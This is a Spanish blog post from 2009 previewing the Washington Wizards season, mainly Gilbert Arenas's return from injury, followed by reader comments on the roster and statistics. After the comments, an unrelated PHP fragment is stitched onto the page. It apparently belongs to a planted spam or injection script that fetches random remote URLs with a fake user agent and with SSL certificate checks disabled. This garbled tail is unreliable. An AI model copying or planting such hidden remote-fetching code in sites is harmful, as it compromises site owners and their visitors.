Washington Wizards: La incógnita Arenas

22 de October de 2009 por txusma

Gilbert Arenas hace dos temporadas que casi no pisa una cancha de baloncesto. Desde noviembre de 2007 seguramente no ha tocado un balón sin sentir dolor en su rodilla derecha y es que, tras 2 o 3 reapariciones infructuosas, no ha sido hasta este verano cuando parece ser que el Agente Zero se encuentra, de nuevo, cerca del 100%.

En la primera temporada que se perdió Arenas, los Wizards consiguieron sobreponerse y liderados por Antawn Jamison y Caron Butler lograron clasificarse para Playoffs donde cayeron, totalmente asolados por las lesiones, ante los Cavs de Lebron James. Es curioso, porque esa temporada consiguieron un mejor balance que en la temporada anterior, la 2006/2007, la mejor, cualitativa y cuantitativamente de Gilbert Arenas. La temporada pasada, de nuevo sin el 3 veces All-Stars, los Wizards sólo fueron capaces de ganar 19 partidos. Casualidad o no, Brendan Haywood también se perdió casi toda la temporada. ¿Podemos sacar alguna conclusión de estos 4 datos? Posiblemente no, pero lo cierto es que con Arenas o sin él, los Wizards parecen ser, sin perder ninguna pieza más, equipo del 50% de victorias-derrotas. Cualquier aficionado que piense que con el retorno del base se mejorarán las 43 victorias de hace 2 años creo que se dará con un canto en los dientes.

De toda manera, Gilbert Arenas, será, sin duda, el base titular del equipo y es que sería una pena desaprovechar la aureola que desprende el jugador franquicia. Que nadie me malinterprete. Arenas, antes de la lesión, era uno de los 10 mejores jugadores de la liga y una de las razones por las que alguien puede pagar una entrada para ver un partido de la NBA en directo. Queda por ver en que estado vuelve y si de alguna manera ha cambiado su estilo de juego. De momento, en esta preseason se le ha visto con ganas de pasar más el balón pero no sé si eso es debido a que sigue en fase de recuperación y no quiere forzar o a algún cambio verdaderamente definitivo. Sin duda, la gran incógnita de este equipo.

A su lado se abren los interrogantes y es que los Wizards cuentan con una buena bateria de bases y escoltas. Lo más normal es que DeShawn Stevenson, ese jugador que no es capaz de tirar triples mejor que Arenas con una sola mano y que lleva siendo titular 3 temporadas consecutivas, mantenga de inicio su posición. Y decimos de inicio porque es posible que Randy Foye le acabe comiendo la tostada en más de una ocasión. La versatilidad del ex de los Wolves, capaz de jugar tanto de base como de escolta, abre muchas opciones a los Wizards. Salvando las distancias es parecido a Arenas, tanto físicamente como en estilo de juego y es posible que les veamos compartir muchos minutos en pista. Sin duda, se trataría de una pareja explosiva, complicadísima de defender, pero habría que ver como afectaría al juego ofensivo en general.

Caron Butler, Antawn Jamison y Brendan Haywood completan el quinteto como llevan haciendo ya 4 temporadas. El ex de los Lakers, regalado en aquel trade de infausto recuerdo para los amarillos, es capaz de asumir el papel protagonista en ataque como ha demostrado los 2 últimos años y tampoco desentona en defensa. Desgraciadamente suele perderse siempre unos 20 partidos por temporada. Jamison es posiblemente el hombre más regular y consistente de toda la plantilla y lleva 5 temporadas jugando a nivel All-Stars mientras que Haywood es un defensor muy infravalorado. De hecho, es una pieza básica en el entramado defensivo de este equipo. Su baja el año pasado fue devastadora y este año, en el que se juega un nuevo contrato, se puede convertir en un jugador clave.

En el banco, encontramos una mezcla de veteranía y juventud muy interesantes. Mike James y Javaris Crittenton lucharán por hacerse con el puesto de base suplente. James es un veterano que ya está de vuelta de todo más preocupado en tirar y encestar que en hacer jugar al equipo. Crittenton, en cambio, es todo lo contrario: un jugador con una gran ética de trabajo al que le cuesta muchísimo mirar el aro. Como ninguna de las 2 opciones es muy clara es más que posible que finalmente sea Randy Foye el que asuma ese rol, provocando que Nick Young o Mike Miller pasen a jugar de escoltas. El jugador de tercer año debe tener marcado en el calendario el día que los Wizards traspasaron su elección del draft a cambio de Foye y Miller y que le ha cerrado bastante las puertas. Ha ido mejorando paulativamente aunque posiblemente se ha encasillado como jugador unidimensional capaz “tan solo” de tirar y calentar un partido. Por su parte, el ex rookie del año del 2001 llega para aportar tiro exterior que sumado a sus buenas aptitudes para el pase y el rebote hacen de él un activo muy importante del banquillo wizard. Sin duda, un buen refuerzo. Dominic McGuire también podría jugar algunos minutos como alero o incluso como escolta.

En el juego interior Andray Blatche y Fabricio Oberto serán los principales recambios. El primero se encuentra ante la temporada que marcará su futuro definitivamente. A pesar de ser un ala-pívot, Blatche ha venido jugando de center muchos minutos en estas últimas temporadas con resultados desiguales. Ahora, con la vuelta de Haywood y el fichaje de Oberto, Blatche volverá a su posición natural donde mejor puede exprimir sus cualidades. Además, Jamison ha sufrido una luxación de hombro que en teoría no le ha de apartar mucho de las canchas, pero que, en caso de complicarse, podría otorgar a Blatche el rol de titular en los primeros partidos de la temporada. Por su parte, el  jugador argentino aportará cosas que Blatche no puede aportar debido a su juventud: experiencia y rigor defensivo. También tendrá minutos un Javale McGee aún en proceso de mejora. El ex-pívot de Nevada tiene aún mucho que mejorar sobretodo en lo que respecta a su consistencia y regularidad y este año encontrará minutos para hacerlo, aunque no muchos más que el año pasado a no ser que Oberto o Blatche sufran algún tipo de lesión.

No se puede negar que los Wizards huelen a equipazo y es que es lo mínimo que se puede decir de un equipo que cuenta con 3 All-Stars en sus filas. Si además dispone de un banquillo bastante profundo, ¿porqué que no me acabo de fiar de ellos? Pues porque no tengo claro como afectará a la química de un equipo que hace 2 años que juega sin Arenas su vuelta y más sin tener claro cual será su nivel y sus expectativas esta temporada. Eso sí, si las cosas empiezan a funcionar, se mantienen sanos y poco a poco van adaptándose unos a otros y encontrando su juego serán ultra-peligrosos. No creo que nadie quiera encontrárselos en playoffs…

Quinteto: Gilbert Arenas, DeShawn Stevenson, Caron Butler, Antawn Jamison y Brendan Haywood
6º hombre: Randy Foye

Pronóstico: Entrando por los pelos a Playoffs pero una vez allí…

Comenta

14 comentarios a esta entrada

  1. Óscar dice:
    #1

    Los Wizards son un poco como los “Rockets del Este”, por el tema de las lesiones. Al menos, no han tenido hasta ahora ningún contratiempo serio (salvo el hombro derecho de Jamison…), pero estamos en Octubre…
    Con el equipo al completo, lo lógico sería pensar no sólo en Playoffs, sino en estar entre los 5 primeros. En la “megaporra” se ve que confiamos en ellos, pero los antecedentes y la temporada pasada son tan malos que es difícil que resurjan tan fácilmente. Coincido con Txusma en que será clave el inicio, las primeras semanas marcarán totalmente el resto de la temporada.
    Sobre el papel, un gran equipo y una muy buena plantilla. Han perdido a Juan Dixon, Oleksiy Pecherov (MIN), Darius Songaila (NOH), y Etan Thomas (OKC). Éste último, quizás lo más destacado, aunque tenían “overbooking” en los puestos interiores. Al regalar el 5º puesto del Draft a Minnesota, una decisión inteligente pero arriesgada, han recibido a Randy Foye y Mike Miller, lo que les supone un salto cualitativo muy importante en el perímetro. También ha llegado Oberto. Y Vincent Grier y Paul Davis están luchando por ser el 15º hombre del roster en esta pre-season.
    El balance bajas/altas parece positivo, pero teniendo en cuenta siempre que tenían una 5ª elección, que descartaron al no tener suerte en la lotería. Parece que querían sólo a Griffin, Harden o Evans, o si no, buscar un buen traspaso, como han hecho. Un detalle: no tienen ni un “rookie”, ni siquiera a prueba.
    Son 3 por puesto de un buen nivel, con 4 potenciales All-Stars. Lo mejor, su versatilidad y la media de estatura. Hay varios “combo” base/escoltas, o escolta/aleros, etc:
    1 : J.CRITTENTON, M.JAMES
    1/2 : R.FOYE, G.ARENAS, N.YOUNG, D.STEVENSON.
    2/3 : M.MILLER, C.BUTLER, V.Grier (?).
    3/4 : A.JAMISON, D.McGUIRE (éste juega de 2,3,4…).
    4/5 : A.BLATCHE, F.OBERTO.
    5 : B.HAYWOOD, J.McGEE, P.Davis (?).

      Citar

  2. kantonyo dice:
    #2

    Wizards fue de los peores equipos en la linea de 3 puntos, a la vez que fue el peor equipo defendiendo en esa zona, ya que sus adversario fueron los que mas promedio de 3 puntos consiguieron.

    2008-2009:
    3p:
    Pos. 29 –> Wizards: 33% 4.8 tc 14.6 ti – 14,4 puntos por partido desde la linea de 3.
    Pos. 4 –> Oponente: 39% 8.2 tc 21.2 ti – 24,6 puntos por partido desde la linea de 3.

    Otro dato que refleja el juego de WW el año pasado: fueron de lo mejorcito en la pintura y de lo peor en el tiro exterior, según hoopsstats.com.

    Puntos en la pintura:
    Pos. 4 —> Wizards : 3713 pt – 48% – 45.3 ppp
    Puntos fuera de la pintura:
    Pos. 30 —> Wizards : 4164 pt – 42% – 50.8 ppp
    Totales:
    Pos. 25 —> Wizards : 7877 pt – 45% – 96.1 ppp

      Citar

  3. Kiki dice:
    #3

    De ahí el fichaje de Mike Miller… Con la vuelta de Arenas, más Foye, Young, Butler, el mismo Jamison…
    Tiradores no les faltan, pero al empezar tan mal el año pasado todo se torció demasiado. A ver los primeros partidos, pero ya se han lesionado de nuevo Haywood, Jamison, Crittenton… Es su sino.

      Citar

  4. Jabho dice:
    #4

    El año pasado los Wizards fueron de lo peor de la liga en muchos aspectos… falta de motivación por las lesiones, supongo.

    Coincido, muy buen equipo sobre el papel y con todos sanos, pero desconfiamos por su tendencia a lesionarse…

    Mcgee tiene buena pinta y por ahñi podrñia venir una parte de mejora. La otra es Miller, que es un gran jugador y que si no es titular será el 6º del equipo

      Citar

  5. Dantley2 dice:
    #5

    La ecuación creo que es fácil:
    * Arenas+Butler+Jamison+Haywood sanos = playoffs y pasando ronda
    * Haywood lesionado = probablemente playoffs
    * alguno de los otros tres lesionados = papeletas para el sorteo de John Wall

    Jabho, sabes que me gusta McGee, más que gustarme, me encanta, creo que tiene unas posibilidades tremendas, pero lo veo a 2 o 3 años al menos de rendir lo suficiente como para tener un impacto decisivo. Sobre todo, mejorar en defensa que hasta ahora intimida pero defiende de pena, parece mentira que haya mamado baloncesto toda su vida.

      Citar

  6. Txusma dice:
    #6

    Considero q Haywood esta muy infravalorado. Tanto que yo soy de la opinion que sin Haywoos los Wizards tienes menos oportunidades de clasificarse para Playoffs que con él y es que creo que toda la defensa descansa casi en sus espaldas. El año pasado sin él, tenían que jugar Blatche o McGee q no tienen la experiencia necesaria ni la veterania para dirigir la defensa correctamente. Este año, el fichaje de Oberto creo les puede ayudar a cubrir el vacio en caso de producirse.
    En cambio si se lesiona alguno de los otros 3 entraria en el quinteto titular o Randy Foye o Mike Miller que no desentonarían en demasía.
    Pero vamos, q quiero ver como se adapta el grupo a Arenas y Arenas al grupo, q llevan 2 años con todos los mecanismos montados para jugar sin él.

      Citar

  7. Txusma dice:
    #7

    Error en el anterior comentario, evidentemente: Qeria decir q sin Haywood tienen menos oporunidades de clasificarse que sin uno del Big Three.

    Estas horas…

      Citar

  8. kantonyo dice:
    #8

    No estoy para nada de acuerdo con Txusma, creo que teniendo a Blatche o McGee no es imprescindible Haywood, ya que una pareja Jamison-Blatche o Jamison-McGee no desentona en el Este. En cambio necesitan que Foye cuaje en el equipo, que Miller aporte versatilidad con su tiro y que Arenas este al 100%, para mí esa es la clave en este equipo si quiere disputar los PO, deben mejorar el juego exterior y que no falten Butler y Jamison.

      Citar

  9. Txusma dice:
    #9

    A lo mejor no desentona a la hora de atacar, pero defendiendo te aseguro q la solidez q aporta Haywood no la aporta ni Blatche, ni McGee ni Jamison. El año pasado fueron de los 7 equipos que mas puntos recibieron por partido y la temporada anterior, en cambio, eran el duodécimo que menos puntos recibian. Y la diferencia era Haywood, principalmente.

      Citar

  10. kantonyo dice:
    #10

    Yo creo como he aportado en las estadísticas, que no fue en el juego interior donde naufragaron, sino en el exterior, recibieron mas puntos desde la zona de triples que ningun equipo, con una diferencia considerable con el segundo. McGee es una gran defensor, lo único que necesita hacerse como jugador, en este momento puede que sea mejor Haywood, pero en mi opinion Haywood no tiene potencial ni ofensivo ni defensivo, para cambiar el rumbo de una franquicia.

      Citar

  11. sergio dice:
    #11

    no… ni Bruce Bowen…, pero mira lo necesario que era el tio luego….

      Citar

  12. Txusma dice:
    #12

    Si hablamos de presente creo q es evidente que Haywood es valioso para los Wizards que McGee y Blatche. Hablando de presente, q quede claro.
    A lo mejor los puntos encajados desde la linea de 3 venían debido a las ayudas de Butler o Stevenson al juego interior donde Blatche y McGee no daban abasto. Es una posibilidad no?

      Citar

  13. Dantley2 dice:
    #13

    Kantonyo, más que buen defensor, McGee es buen intimidador, pero fíjate en defensa que deja unos agujeros tremendos. Sí estoy de acuerdo en que Haywood defensívamente aporta, pero lo considero menos importante que Arenas-Butler-Jamison. Lo que pasa es que son tantos potenciales lesionados que parece imposible que lleguen todos sanos

      Citar

  14. Txusma dice:
    #14

    Para empezar Jamison se pierde los primeros partidos de la regular y ojito q es una lesión jodidilla, que te puede tener parado igual 2 semanas como 2 meses, como dejarte renqueante para toda la temporada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>